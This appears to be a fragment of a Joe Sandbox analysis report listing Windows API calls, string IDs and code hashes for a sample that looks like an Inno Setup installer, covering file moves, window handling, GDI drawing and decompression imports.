                                                                              • CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
                                                                              Similarity
                                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                              • String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                              • API String ID: 2573145106-911929905
                                                                              • Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                              • Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
                                                                              • Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                              • Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompressInit), ref: 0045CDB1
                                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompress), ref: 0045CDC1
                                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompressEnd), ref: 0045CDD1
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                              • API String ID: 190572456-212574377
                                                                              • Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                              • Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
                                                                              • Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                              • Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                              • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                                • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                              • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                              Similarity
                                                                              • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                              • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                              • API String ID: 142928637-2676053874
                                                                              • Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                              • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                              • Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                              • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                              • API String ID: 667068680-222143506
                                                                              • Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                              • Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
                                                                              • Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                              • Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041B755
                                                                              • 73A1A570.USER32(?), ref: 0041B761
                                                                              • 73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                              • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                              • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                              • 73A18830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                              Similarity
                                                                              • API ID: A18830$A122A26310A570Focus
                                                                              • String ID:
                                                                              • API String ID: 3906783838-0
                                                                              • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                              • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                              • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                              • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
APIs
• GetFocus.USER32 ref: 0041BA27
• 73A1A570.USER32(?), ref: 0041BA33
• 73A18830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
• 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
• 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
• 73A18830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: A18830$A122A26310A570Focus
• String ID:
• API String ID: 3906783838-0
• Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
• Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
• Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
• Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
APIs
• GetFocus.USER32 ref: 0041B58E
• 73A1A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
• 73A24620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
• 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
• 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
• 73A1A480.USER32(?,?,0041B643,?,?), ref: 0041B636
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: E680$A24620A480A570Focus
• String ID:
• API String ID: 3709697839-0
• Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
• Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
• Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
• Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
APIs
• SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
• Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
• Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
• Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
• Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
• GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
• 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
• 73A24620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
• 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
• 73A1A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: A24620MetricsSystem$A480A570
• String ID:
• API String ID: 4042297458-0
• Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
• Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
• Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
• Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
• GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
• Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
• Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
• Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
APIs
  • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
• UnrealizeObject.GDI32(00000000), ref: 0041B28C
• SelectObject.GDI32(?,00000000), ref: 0041B29E
• SetBkColor.GDI32(?,00000000), ref: 0041B2C1
• SetBkMode.GDI32(?,00000002), ref: 0041B2CC
• SetBkColor.GDI32(?,00000000), ref: 0041B2E7
• SetBkMode.GDI32(?,00000001), ref: 0041B2F2
  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
• Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
• Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
• Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: $pI$.tmp$}RI
• API String ID: 3498533004-1860564545
• Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
• Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
• Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
• Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
APIs
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
  • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
  • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
• Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
• Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
• Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
• Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
APIs
• GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: File$Attributes$Move
• String ID: $pI$isRS-%.3u.tmp
• API String ID: 3839737484-4128586672
• Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
• Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
• Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
• Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
• Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
• Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
• Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
• Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
APIs
• RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
• RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
• LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
• RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID: t:r
• API String ID: 730355536-924571639
• Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
• Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
• Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
• Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: $pI$DeleteFile$MoveFile
• API String ID: 3024442154-1403374609
• Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
• Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
• Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
• Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
• InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
• Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
• Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
• Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
• Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00476644
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
